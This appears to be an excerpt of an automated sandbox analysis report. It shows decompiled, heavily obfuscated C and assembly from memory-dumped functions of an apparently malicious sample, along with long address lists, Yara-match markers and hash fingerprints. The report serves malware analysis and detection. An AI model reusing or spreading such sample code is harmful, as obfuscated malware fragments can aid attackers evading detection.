									_push(_t41);
									asm("sbb bl, [0xac1bc12c]");
									_t50 = _t58 |  *0xde2afba1;
									_t41 = _t41 +  *0x99ad4402;
								} while (_t41 >= 0);
								 *0x707b7279 =  *0x707b7279 ^ _t65;
								 *0xce9323b4 = _t41;
								asm("sbb bh, [0x46d7b0b3]");
								_t70 = _t70 + 1;
								asm("sbb edi, 0x92495a6e");
								_pop(_t79);
								_pop(_t101);
								asm("rcr dword [0xc59abcf3], 0x29");
								_t41 = 0xffffffffbdc58cf7;
								asm("adc ebx, [0xf6782791]");
								 *0x693a4106 =  *0xc3ec7a66;
								_t63 = ((_t50 |  *0xd05669b5) +  *0xb5c30a1a &  *0x1c102886) - 0xec7caa98 + 1;
								asm("rol byte [0xdada57f6], 0x70");
								 *0x4da63c13 = _t63;
								_t50 = _t63 + 1 -  *0x440d92ea;
								asm("sbb dl, [0xfbb1d5b2]");
								asm("lodsd");
								_t95 = _t101 |  *0x3affe9ef;
								asm("cmpsb");
								_t65 = _t65 & 0x000000b0;
								 *0xf70b8b30 =  *0xf70b8b30 & 0xffffffffbdc58cf7;
								asm("rcr byte [0x3ba13710], 0x8f");
								_t74 = (_t74 | 0xa9c2963e) - 1 -  *0x8eaabace;
								asm("cmpsw");
							} while (_t74 <= 0);
							_t50 =  *0xe346017e * 0x5080;
							_t65 =  *0x7c8a2abd;
							_push(0xbdc58c35);
						} while (_t50 < 0);
						 *0xc7033378 =  *0xc7033378 >> 0xf0;
						_t70 = _t70 + 0x51469ec0;
						_t65 = _t65 - 2;
						 *0xaf6b0bec =  *0xaf6b0bec >> 0x8e;
						asm("rcl dword [0x8386a03], 0x8e");
						asm("rol dword [0xcc6ead35], 0x38");
						_pop(_t102);
						asm("adc edx, [0x405ae539]");
						_t50 = _t50 +  *0x4b726635;
						 *0x69391c7 =  *0x69391c7 << 0xa2;
						_t95 = _t102 ^ 0x363591d6;
						asm("sbb edx, 0xbd2bc0d5");
						_t79 = (_t79 | 0x0dfaf7c5 |  *0x2e3d97f7) ^  *0xd97fccb8;
						_t41 = 0x29418436;
						 *0x4f4ff9c1 =  *0x4f4ff9c1 & 0x5df4c40f;
					} while ( *0x4f4ff9c1 > 0);
					asm("adc ebp, [0x94b541c4]");
					_t95 = _t95 ^ 0x94e5ac11;
					 *0xe0f6db8d =  *0xe0f6db8d >> 0x4c;
					asm("sbb ebp, [0x170760f5]");
					 *0x62978fc2 =  *0x62978fc2 - _t65;
					_push(_t79);
					 *0x9a9cfc01 = _t74;
					_t79 = _t79 +  *0x4d79ef4;
					asm("adc [0x25441d2b], edi");
					_t70 =  *0xc5212a69 * 0x9f;
					asm("adc ebx, [0xb9ebefc4]");
					_t65 = _t65 |  *0xabf5f897;
					asm("rcl byte [0x2bd6d1f6], 0x7a");
					_t74 =  *0x9a9cfc01 ^ 0xa51d879a;
					_t41 = 0x29418437;
				} while (0xbdc58c35 >= 0);
				 *0xc61f37c8 =  *0xc61f37c8 << 0x32;
				L1();
				 *0x626221e8 = _t79;
				 *0xe9b5d501 =  *0xe9b5d501 ^ 0xbdc58c35;
				asm("adc bl, 0xb3");
				return 0x89c8d999;
			}


















                                    0x0041e5f4
                                    0x0041e5f4
                                    0x0041e5f4
                                    0x0041e5f4
                                    0x0041e5f4
                                    0x0041e5f4
                                    0x0041e5f5
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5f7
                                    0x0041e5fc
                                    0x0041e602
                                    0x0041e603
                                    0x0041e60a
                                    0x0041e612
                                    0x0041e61c
                                    0x0041e622
                                    0x0041e628
                                    0x0041e630
                                    0x0041e63d
                                    0x0041e643
                                    0x0041e649
                                    0x0041e64f
                                    0x0041e650
                                    0x0041e651
                                    0x0041e657
                                    0x0041e657
                                    0x0041e665
                                    0x0041e66b
                                    0x0041e671
                                    0x0041e677
                                    0x0041e67a
                                    0x0041e687
                                    0x0041e689
                                    0x0041e68e
                                    0x0041e694
                                    0x0041e69b
                                    0x0041e6a1
                                    0x0041e6ad
                                    0x0041e6bd
                                    0x0041e6c3
                                    0x0041e6c9
                                    0x0041e6cf
                                    0x0041e6d0
                                    0x0041e6d6
                                    0x0041e6d9
                                    0x0041e6d9
                                    0x0041e6e5
                                    0x0041e6eb
                                    0x0041e6ec
                                    0x0041e6f8
                                    0x0041e6fe
                                    0x0041e704
                                    0x0041e70b
                                    0x0041e711
                                    0x0041e714
                                    0x0041e717
                                    0x0041e717
                                    0x0041e723
                                    0x0041e729
                                    0x0041e735
                                    0x0041e736
                                    0x0041e73c
                                    0x0041e754
                                    0x0041e75d
                                    0x0041e75e
                                    0x0041e764
                                    0x0041e76a
                                    0x0041e770
                                    0x0041e771
                                    0x0041e771
                                    0x0041e77d
                                    0x0041e793
                                    0x0041e799
                                    0x0041e79f
                                    0x0041e7a0
                                    0x0041e7a7
                                    0x0041e7ad
                                    0x0041e7b3
                                    0x0041e7ca
                                    0x0041e7d7
                                    0x0041e7ef
                                    0x0041e7f6
                                    0x0041e7fc
                                    0x0041e803
                                    0x0041e809
                                    0x0041e810
                                    0x0041e811
                                    0x0041e818
                                    0x0041e81e
                                    0x0041e824
                                    0x0041e82a
                                    0x0041e82b
                                    0x0041e82c
                                    0x0041e83e
                                    0x0041e844
                                    0x0041e850
                                    0x0041e856
                                    0x0041e85c
                                    0x0041e863
                                    0x0041e869
                                    0x0041e86f
                                    0x0041e875
                                    0x0041e87b
                                    0x0041e882
                                    0x0041e882
                                    0x0041e889
                                    0x0041e893
                                    0x0041e895
                                    0x0041e89b
                                    0x0041e8a1
                                    0x0041e8a7
                                    0x0041e8ad
                                    0x0041e8b3
                                    0x0041e8b9
                                    0x0041e8bf
                                    0x0041e8c5
                                    0x0041e8c6
                                    0x0041e8c6
                                    0x0041e8c6
                                    0x0041e8cc
                                    0x0041e8cc
                                    0x0041e8d8
                                    0x0041e8de
                                    0x0041e8e4
                                    0x0041e8f5
                                    0x0041e8f7
                                    0x0041e903
                                    0x0041e90a
                                    0x0041e911
                                    0x0041e911
                                    0x0041e917
                                    0x0041e91d
                                    0x0041e923
                                    0x0041e924
                                    0x0041e92b
                                    0x0041e931
                                    0x0041e931
                                    0x0041e93d
                                    0x0041e943
                                    0x0041e955
                                    0x0041e95d
                                    0x0041e96e
                                    0x0041e98c
                                    0x0041e98d
                                    0x0041e99a
                                    0x0041e9a1
                                    0x0041e9a4
                                    0x0041e9b0
                                    0x0041e9b6
                                    0x0041e9ba
                                    0x0041e9c1
                                    0x0041e9c8
                                    0x0041e9ce
                                    0x0041e9d4
                                    0x0041e9d5
                                    0x0041e9db
                                    0x0041e9dc
                                    0x0041e9e0
                                    0x0041e9e6
                                    0x0041e9ed
                                    0x0041e9f3
                                    0x0041e9f3
                                    0x0041e9fb
                                    0x0041ea05
                                    0x0041ea0b
                                    0x0041ea0b
                                    0x0041ea12
                                    0x0041ea20
                                    0x0041ea2c
                                    0x0041ea35
                                    0x0041ea47
                                    0x0041ea4e
                                    0x0041ea5b
                                    0x0041ea6e
                                    0x0041ea7a
                                    0x0041ea81
                                    0x0041ea88
                                    0x0041ea8e
                                    0x0041ea94
                                    0x0041ea9a
                                    0x0041ea9b
                                    0x0041ea9b
                                    0x0041eab1
                                    0x0041eab7
                                    0x0041eabd
                                    0x0041eac4
                                    0x0041eaca
                                    0x0041ead0
                                    0x0041eadd
                                    0x0041eae3
                                    0x0041eae9
                                    0x0041eaef
                                    0x0041eaf9
                                    0x0041eb05
                                    0x0041eb11
                                    0x0041eb19
                                    0x0041eb25
                                    0x0041eb25
                                    0x0041eb41
                                    0x0041eb48
                                    0x0041eb4d
                                    0x0041eb53
                                    0x0041eb59
                                    0x0041eb62

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e07a8342878c5e460a6ffccb814837c72114209dfacf282c137d8597fe7d35e6
                                    • Instruction ID: 535ae5cadeb9f36680de0ea1ef2ace829307583a102d6625614c620c0245ec67
                                    • Opcode Fuzzy Hash: e07a8342878c5e460a6ffccb814837c72114209dfacf282c137d8597fe7d35e6
                                    • Instruction Fuzzy Hash: 14D1CA32918395DFD306DF79E99AB823FB2F712324B08424EC9E197492D734255ACF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D1AB, Relevance: .2, Instructions: 199COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E0041D1AB(void* __eax, signed char __ebx, signed int __ecx, signed char __edx, void* __edi, signed int __esi) {
				signed char _t22;
				signed char _t29;
				signed int _t33;
				signed char _t36;
				void* _t44;
				signed int _t48;
				intOrPtr _t52;
				void* _t55;

				_t48 = __esi;
				_t36 = __edx;
				_t33 = __ecx;
				_t29 = __ebx;
				_t22 = __eax + 0x18b312e3;
				_push(_t55);
				_t56 = _t55 +  *0x27e95ec5;
				if(_t56 < 0) {
					__ebp =  *0xf0988d7d * 0xf422;
					__edx = __edx ^ 0x5b77bd1b;
					__eflags =  *0xb03fb59c &  *0xf0988d7d * 0x0000f422;
					 *0xe93148ea =  *0xe93148ea + __esi;
					__edx =  *0xe4ca3116;
					asm("adc edx, [0xec840716]");
					__eflags = __ch -  *0x91f58a24;
					asm("sbb [0x8ae5ac38], bl");
					asm("sbb eax, [0xf993cb09]");
					asm("sbb esp, 0x6756d20e");
					asm("rcl dword [0x780b5fd3], 0xd9");
					__ebx = __ebx + 1;
					__eflags = __ebx;
					if(__eflags == 0) {
						asm("adc esi, [0xf9276c75]");
						if(__eflags >= 0) {
							__ebp =  *0xf9b74970;
							 *0xa1e50b30 =  *0xa1e50b30 | __bh;
							__eflags =  *0xa1e50b30;
							asm("adc esp, 0xeb067923");
							if( *0xa1e50b30 < 0) {
								_t17 = __edi;
								__edi =  *0xf9b74873;
								 *0xf9b74873 = _t17;
								 *0xfdc90e30 = __al;
								__edi =  *0xf9b74873 ^  *0xd12394f5;
								asm("rcr dword [0x1b9feacb], 0x64");
								__esi = 0xe99993d;
								asm("sbb edi, [0x9adbc19e]");
								_pop(__ebp);
								_push(__edi);
								asm("adc [0x6ab1e7ee], ebp");
								 *0x9981b3cb =  *0x9981b3cb ^ __ebp;
								asm("adc [0xa9104a12], dl");
								__ecx = __ecx -  *0x2316b6ea;
								__eflags = __ecx;
								if(__ecx < 0) {
									__eax =  *0xad92df73;
									__ecx = __ecx & 0x631703fe;
									__eflags =  *0x123ad519 & __ebp;
									 *0xcad9b4f2 =  *0xcad9b4f2 & __bl;
									 *0x17bb9e32 =  *0x17bb9e32 & 0x000000b0;
									__eflags =  *0x22899af2 - __bh;
									asm("sbb eax, [0xf10d3ad4]");
									asm("adc dh, 0x20");
									__ecx = __ecx + 0xb230a1a3;
									__esi = 0xe99993c;
									 *0x43523b66 =  *0x43523b66 << 0xb3;
									asm("sbb esi, [0x57102b0f]");
									__edi = __edi + 0xd51b3719;
									__dh = __dh - 0xb5;
									__esi =  *0xb4c95d69 * 0x8baf;
									__eflags = __cl - 0x34;
									_pop(__ebp);
									asm("scasd");
									__eflags = __edx -  *0xd7f712d4;
									__ebx = __ebx -  *0x650537cf;
									__eflags = __ebx;
									if(__ebx >= 0) {
										__edi = 0x7f4db570;
										__ecx = __ecx - 0x64c0551e;
										 *0x3acc1c82 =  *0x3acc1c82 - __dh;
										__ebx = __ebx - 1;
										asm("rcl dword [0xfdda0794], 0x61");
										__ah = __ah;
										__eflags = __ebp - 0xa90febbe;
										asm("rcl dword [0x4d566864], 0x10");
										__ecx = __ecx &  *0xbd1817f5;
										asm("ror dword [0xb427ca35], 0xe6");
										 *0x747a21b =  *0x747a21b ^ __ebp;
										asm("sbb [0xabbed52b], ebp");
										asm("sbb cl, [0xab3c8038]");
										__edi =  *0xece0b769 * 0xcb8a;
										__eflags =  *0x76ffe91f - __edi;
										__edx = 0x943845c1;
										asm("sbb ebp, [0x53eb2fcc]");
										 *0x23589f04 =  *0x23589f04 ^ __al;
										__eflags =  *0x23589f04;
										if( *0x23589f04 <= 0) {
											__ebx =  *0xfaf4ac7f * 0xd97e;
											asm("movsw");
											 *0x6d0a93f2 =  *0x6d0a93f2 >> 0x12;
											_pop(__ebx);
											__eax = __eax ^  *0xd5898c06;
											__bl = __bl -  *0x675b692c;
											 *0x4438caed =  *0x4438caed >> 0xf8;
											__edi = __edi |  *0x1ecd0abc;
											__ch = __ch ^ 0x00000086;
											__eflags = __ch;
											_push(0x943845c1);
											if(__ch >= 0) {
												__esi = __esi +  *0xe13bb072;
												__dh = 0xc9;
												__eax = __eax ^ 0x65d01fdb;
												__esi = __esi +  *0x41a9b501;
												__eflags = __esi;
												if(__esi == 0) {
													asm("sbb [0x61c847b], edx");
													asm("rcl dword [0xe7e5bcba], 0xd5");
													_pop(__ecx);
													__eflags =  *0x4eaeed29 & __ebp;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					 *0x3b97609 =  *0x3b97609 & _t56;
					_t36 = _t36 & 0x000000b2;
					if(_t36 != 0) {
						continue;
					}
					L2:
					_pop(_t44);
					 *0x9b43710d =  *0x9b43710d >> 0x59;
					_t48 = (_t48 & 0xec6820a1) +  *0x8dca0c2b + 1;
					asm("ror dword [0xaa6cd8fc], 0x15");
					 *0x74f8a804 =  *0x74f8a804 & _t29;
					 *0x5b0f1f05 = _t29;
					asm("adc ecx, 0x8c0ee43d");
					 *0x2bfa1939 = _t52;
					 *0xed478613 = _t36 &  *0x3e5484fc & 0x610dd78c;
					_t33 = _t33 ^ 0xb71d1f16 |  *0x951ec62f;
					 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
					_t22 = _t22 + 2 &  *0x10814be3;
					asm("sbb [0xf9062aa2], bl");
					asm("adc bh, [0x41608722]");
					_t56 = 0x7c387416;
					 *0x809b9ef =  *0xed478613;
					asm("adc esp, [0xf6102665]");
					_t36 = _t44;
					 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
					 *0x70a50ad7 =  *0x70a50ad7 - _t36;
					_push(_t44 + 1);
					_t29 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
					_t52 =  *0xab99e09;
					 *0xab99e09 =  *0x2bfa1939;
					if(_t29 >= 0) {
						while(1) {
							L1:
							 *0x3b97609 =  *0x3b97609 & _t56;
							_t36 = _t36 & 0x000000b2;
							if(_t36 != 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										goto L1;
									} while (_t36 != 0);
									goto L2;
								} while (_t29 >= 0);
								goto L3;
							} while (_t33 >= 0);
							asm("rol byte [0x4c68f784], 0x8d");
							_pop(_t22);
							 *0x206342b0 =  *0x206342b0 << 0x5c;
							asm("rcr byte [0x4eac7ee7], 0x86");
							_t29 =  *0x91e576a * 0xa901;
							_push(0x2f663016);
							_t36 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
							asm("sbb ebx, [0x31369c6e]");
							_t56 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
							_t48 = _t48 - 1;
							if(_t48 != 0) {
								continue;
							} else {
								asm("adc esi, [0xcdd02e7a]");
								_t22 = _t22 + 0x347ded17;
								if(0x2f663016 != 0) {
									continue;
								} else {
									 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
									 *0xb06d5ff4 =  *0xb06d5ff4 | _t29;
									 *0x591ac92e =  *0x591ac92e << 0xcc;
									 *0x95d3f14 = _t36;
									asm("lodsb");
									 *0xfd7e63c6 =  *0xfd7e63c6 | _t22;
									 *0xb5e49981 =  *0xb5e49981 + _t48 - 0x520b7c0f;
									asm("sbb [0xe8fcc704], ah");
									return _t22 - 0x8016fbf1;
								}
							}
						}
					}
					L3:
					 *0xb99f09b7 =  *0xb99f09b7 ^ _t29;
					asm("adc eax, [0xf7196c7]");
					 *0x1262affc =  *0x1262affc >> 0xdc;
					_t33 = _t33 -  *0x1c4badca;
					asm("rcr dword [0x92772366], 0x3f");
					_t36 = 0x7c387416;
					asm("rcr dword [0xd5227b61], 0x58");
					_t22 =  *0xfd3b2b3a;
					 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
					L1:
					 *0x3b97609 =  *0x3b97609 & _t56;
					_t36 = _t36 & 0x000000b2;
				}
			}











                                    0x0041d1ab
                                    0x0041d1ab
                                    0x0041d1ab
                                    0x0041d1ab
                                    0x0041d1ab
                                    0x0041d1b0
                                    0x0041d1b1
                                    0x0041d1b7
                                    0x0041d1bd
                                    0x0041d1c7
                                    0x0041d1cd
                                    0x0041d1d3
                                    0x0041d1d9
                                    0x0041d1df
                                    0x0041d1e5
                                    0x0041d1eb
                                    0x0041d1f1
                                    0x0041d1f7
                                    0x0041d1fd
                                    0x0041d204
                                    0x0041d204
                                    0x0041d205
                                    0x0041d20b
                                    0x0041d211
                                    0x0041d217
                                    0x0041d21d
                                    0x0041d21d
                                    0x0041d223
                                    0x0041d229
                                    0x0041d22f
                                    0x0041d22f
                                    0x0041d22f
                                    0x0041d235
                                    0x0041d23c
                                    0x0041d242
                                    0x0041d249
                                    0x0041d24e
                                    0x0041d254
                                    0x0041d255
                                    0x0041d256
                                    0x0041d25c
                                    0x0041d262
                                    0x0041d268
                                    0x0041d268
                                    0x0041d26e
                                    0x0041d274
                                    0x0041d279
                                    0x0041d27f
                                    0x0041d285
                                    0x0041d28b
                                    0x0041d297
                                    0x0041d29d
                                    0x0041d2a3
                                    0x0041d2a6
                                    0x0041d2ac
                                    0x0041d2ad
                                    0x0041d2b4
                                    0x0041d2ba
                                    0x0041d2c0
                                    0x0041d2c3
                                    0x0041d2cd
                                    0x0041d2d0
                                    0x0041d2d1
                                    0x0041d2d2
                                    0x0041d2d8
                                    0x0041d2d8
                                    0x0041d2de
                                    0x0041d2e4
                                    0x0041d2ea
                                    0x0041d2f0
                                    0x0041d2f6
                                    0x0041d2f7
                                    0x0041d2fe
                                    0x0041d301
                                    0x0041d307
                                    0x0041d30e
                                    0x0041d314
                                    0x0041d31b
                                    0x0041d327
                                    0x0041d32d
                                    0x0041d333
                                    0x0041d33d
                                    0x0041d343
                                    0x0041d349
                                    0x0041d34f
                                    0x0041d34f
                                    0x0041d355
                                    0x0041d35b
                                    0x0041d365
                                    0x0041d367
                                    0x0041d36e
                                    0x0041d36f
                                    0x0041d375
                                    0x0041d37b
                                    0x0041d382
                                    0x0041d388
                                    0x0041d388
                                    0x0041d38b
                                    0x0041d38c
                                    0x0041d392
                                    0x0041d398
                                    0x0041d39a
                                    0x0041d39f
                                    0x0041d39f
                                    0x0041d3a5
                                    0x0041d3ab
                                    0x0041d3b1
                                    0x0041d3b8
                                    0x0041d3b9
                                    0x0041d3b9
                                    0x0041d3a5
                                    0x0041d38c
                                    0x0041d355
                                    0x0041d2de
                                    0x0041d26e
                                    0x0041d229
                                    0x0041d211
                                    0x0041d205
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x0041cfb1
                                    0x0041cfb7
                                    0x0041cfb8
                                    0x0041cfd3
                                    0x0041cfd5
                                    0x0041cfe8
                                    0x0041cfee
                                    0x0041d000
                                    0x0041d006
                                    0x0041d00c
                                    0x0041d012
                                    0x0041d01f
                                    0x0041d026
                                    0x0041d02c
                                    0x0041d047
                                    0x0041d04d
                                    0x0041d053
                                    0x0041d059
                                    0x0041d05f
                                    0x0041d066
                                    0x0041d06d
                                    0x0041d073
                                    0x0041d074
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d080
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x00000000
                                    0x0041cfa6
                                    0x0041d0f8
                                    0x0041d0ff
                                    0x0041d106
                                    0x0041d10d
                                    0x0041d11a
                                    0x0041d124
                                    0x0041d125
                                    0x0041d12b
                                    0x0041d131
                                    0x0041d137
                                    0x0041d138
                                    0x00000000
                                    0x0041d13e
                                    0x0041d13e
                                    0x0041d144
                                    0x0041d149
                                    0x00000000
                                    0x0041d14f
                                    0x0041d155
                                    0x0041d163
                                    0x0041d169
                                    0x0041d170
                                    0x0041d191
                                    0x0041d192
                                    0x0041d198
                                    0x0041d19e
                                    0x0041d1a9
                                    0x0041d1a9
                                    0x0041d149
                                    0x0041d138
                                    0x0041cfa6
                                    0x0041d086
                                    0x0041d090
                                    0x0041d09c
                                    0x0041d0a9
                                    0x0041d0b6
                                    0x0041d0bc
                                    0x0041d0c3
                                    0x0041d0c4
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfac

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a178324f87d62f99b9b4f817c8a5d5330b14ec8093beffead70d70f378816638
                                    • Instruction ID: d0a787ef5d0c4882c84332649f04fdfaa4120ed1b5a2f0893bc2b3e180e9d69e
                                    • Opcode Fuzzy Hash: a178324f87d62f99b9b4f817c8a5d5330b14ec8093beffead70d70f378816638
                                    • Instruction Fuzzy Hash: FAA12232919791CFC711CF38C986B513FB6F392714B08024EC9A1A75D2E738666ADF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041DFE0, Relevance: .2, Instructions: 169COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b956e0316292c343d49d2964b22c3e23ed7df4df4c8d472d0dabe220079171c5
                                    • Instruction ID: f7a1a914469160107eb2e4e3007130d130db9e75b8ccbba68384749c8465317b
                                    • Opcode Fuzzy Hash: b956e0316292c343d49d2964b22c3e23ed7df4df4c8d472d0dabe220079171c5
                                    • Instruction Fuzzy Hash: 1D91117298D3C1DFEB01DF28D8EA6463F71F756320709478DC4A15B2E2D36426AACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041DFEC, Relevance: .2, Instructions: 166COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E0041DFEC(signed int __eax, signed char __ebx, char __ecx, signed int __edi, signed int __esi, void* __eflags) {
				char _v3;
				signed int _t20;
				void* _t21;
				signed int _t22;
				signed char _t26;
				signed int _t28;
				char _t35;
				intOrPtr _t36;
				signed char _t37;
				signed int _t40;
				signed char _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t51;
				signed int _t54;
				signed int _t58;
				void* _t61;

				_t61 = __eflags;
				_t47 = __esi;
				_t45 = __edi;
				_t35 = __ecx;
				_t26 = __ebx;
				_t20 = __eax;
				_t51 = _t58;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										L1:
										 *0x939ff7b7 = _t26;
										asm("rol byte [0x8f83e7b0], 0xee");
									} while (_t61 == 0);
									asm("rcr dword [0xdc624d74], 0xa3");
									_t47 = _t47 ^  *0xc419e217;
									_t51 = _t51 ^ 0x84e5c4bb;
								} while (_t51 != 0 ||  *0xaeb00218 >= _t35);
								asm("sbb ebx, [0xe77cd173]");
								asm("lodsb");
								 *0x2f9d1616 =  *0x2f9d1616 << 0x43;
								 *0xc1ddbd1c =  *0xc1ddbd1c + _t26;
								 *0xa8e0cc32 =  *0xa8e0cc32 | _t26;
								_t40 = 0xef4544a1 |  *0xc02c16ef;
								_t26 = _t26 ^ 0x000000b2;
								 *0xa8e0cc32 =  *0xa8e0cc32 << 0x53;
								_t51 =  &_v3;
								 *0xc1daa919 =  *0xc1daa919 & 0xef4544a1;
								_t35 =  *0xa8e0cc32;
								asm("rcl dword [0xc83916ef], 0xf7");
							} while ( *0xc1daa919 != 0);
							 *0x997775 =  *0x997775 << 0x43;
							asm("adc dl, [0xd8a8c4a8]");
							 *0xe0cc32c1 =  *0xe0cc32c1 >> 0x2b;
							asm("rcr byte [0x3816efa8], 0x9d");
							 *0x173a7bc8 =  *0x173a7bc8 >> 0x47;
							_push(_t40);
							_t21 = _t20 + 1;
							_push(_t21);
							_t47 = _t47 ^  *0xef45d88d;
							_t41 = _t40 + 0x3a;
							asm("sbb esi, [0x50405217]");
							asm("sbb edi, [0xef45d88d]");
							_t26 = _t26 &  *0x8b7a16ef ^  *0x81c42916;
							 *0x4052173a =  *0x4052173a & _t41;
							 *0xef45d88d =  *0xef45d88d ^ _t26;
							_t22 = _t21;
							 *0xaddd0fb4 =  *0xaddd0fb4 & _t41;
							_t36 = _t35 +  *0xe7553110;
							asm("rcr dword [0x453d99a1], 0xb9");
							asm("adc edi, 0x1db40ffd");
							asm("sbb esp, [0xe0cc3283]");
							asm("adc edx, [0x6d2b16ef]");
							 *0xefbe0b1c =  *0xefbe0b1c - _t36;
							_t20 = _t22 & 0xffffffffe0441081;
							asm("rcr byte [0x8a16efa8], 0x4c");
							_t58 = _t58 &  *0x9cba1d16 &  *0xbe17ff2f;
							 *0xcc32bfdd =  *0xcc32bfdd + _t26;
							asm("rcr byte [0x16efa8e0], 0x50");
							asm("sbb ecx, [0x2b7093ff]");
							_t35 =  *0x32c5f7c6;
							 *0x32c5f7c6 = _t36;
							_t51 =  *0xfa34f216;
							asm("adc bl, 0x4");
							 *0x32b9d9b0 = _t26;
							_push( *0xefa8e0cc);
							asm("rcl dword [0xb3c62116], 0xe6");
							 *0xd601ee67 =  *0xd601ee67 & _t51;
							 *0xa2f716d2 =  *0xa2f716d2 << 0xc;
						} while ( *0xa2f716d2 <= 0);
						_t54 = _t51 ^  *0xe2aa9076;
						_t37 = _t35 - 1;
						 *0xb36b616 =  *0xb36b616 | _t54;
						asm("adc bh, 0x14");
						asm("rcr dword [0x32ccebb8], 0x66");
						 *0xefa8e0cc =  *0xefa8e0cc >> 0x26;
						 *0x8ce2a816 =  *0x8ce2a816 << 0xf0;
						 *0xa8e0cc32 = 0x395f828e;
						_t28 = _t26 &  *0x9e8e16ef;
						 *0xd79c0126 =  *0xd79c0126 >> 0xe1;
						 *0xe0cc32c1 = _t47;
						 *0xba16efa8 =  *0xba16efa8 << 0x8d;
						 *0xaf869af2 =  *0xaf869af2 >> 0xdb;
						 *0x5fc3ccf9 =  *0x5fc3ccf9 | _t28;
						 *0xab9c4208 =  *0xab9c4208 >> 0xc;
						 *0x32baf2c1 =  *0x32baf2c1 & _t37;
						 *0xefa8e0cc =  *0xefa8e0cc << 0x36;
						_t51 = _t54 +  *0xaece9d8d &  *0x983e0416;
						asm("cmpsw");
						_pop(_t46);
						_t20 = _t20 -  *0x16d24939;
						asm("rcl byte [0x71c621c], 0xb2");
						asm("movsb");
						asm("ror dword [0xcc32c1db], 0x9d");
						_t43 =  *0x16efa8e0;
						asm("adc esp, [0x7c73a2fe]");
						 *0xc4a8009a =  *0xc4a8009a >> 0x7d;
						asm("sbb [0x49395fa8], ch");
						 *0x947a16d2 =  *0x947a16d2 & _t37;
						 *0xdec32e33 = _t58;
						 *0xc16efa8 =  *0xc16efa8 + _t20;
						_t45 = _t46 + 1;
						asm("sbb dl, 0xa0");
						asm("adc [0xccecc9b4], bl");
						asm("adc cl, 0xd2");
						 *0xcdc48616 =  *0xcdc48616 + _t46 + 1;
						_t35 = (_t37 &  *0xc1ddbd3c) - 0x32;
						_t47 = 0xefa8e0cc;
						_t58 =  *0xdec32e33 -  *0x93b70016;
						_t26 = ((_t28 |  *0x16d24939) &  *0xa0f4be16 & 0xe0cc32c1) - 1;
					} while (_t26 < 0);
					asm("adc eax, [0xaf88ac70]");
					_pop(_t45);
					_push(0x16d24939);
					 *0x54942410 =  *0x54942410 + _t26;
					 *0xaddd0fb4 =  *0xaddd0fb4 | _t26;
					 *0x90e04c16 =  *0x90e04c16 | 0xefa8e0cc;
				} while ( *0x90e04c16 > 0);
				 *0xa8008977 =  *0xa8008977 ^ 0xefa8e0cc;
				 *0x45d8a8c4 =  *0x45d8a8c4 >> 0x87;
				_t44 =  *0xf9e2bc0;
				 *0xf9e2bc0 = _t43;
				 *0x8f16ef88 = _t35;
				asm("rcl byte [0xa8c4a800], 0xcd");
				asm("ror dword [0x2bbc121f], 0x79");
				asm("adc edx, [0xef8840ec]");
				 *0x9fe24b16 = _t51 & 0x9e3f16ef;
				asm("adc edx, [0xccf0cc31]");
				 *0xe0cc32c1 =  *0xe0cc32c1 ^ _t44;
				 *0x6216efa8 = _t44;
				 *0x9a8081e2 =  *0x9a8081e2 & _t26 +  *0x16ef45d8;
				asm("adc bl, [0xa8c4a800]");
				 *0x3a78d6b6 =  *0x3a78d6b6 ^ 0x16ef45d8;
				 *0xef45d88d =  *0xef45d88d | _t45;
				return _t20 &  *0x40ecb2a1 | 0x00000016;
			}





















                                    0x0041dfec
                                    0x0041dfec
                                    0x0041dfec
                                    0x0041dfec
                                    0x0041dfec
                                    0x0041dfec
                                    0x0041dfed
                                    0x0041dfed
                                    0x0041dfef
                                    0x0041dfef
                                    0x0041dfef
                                    0x0041dfef
                                    0x0041dfef
                                    0x0041dfef
                                    0x0041dfef
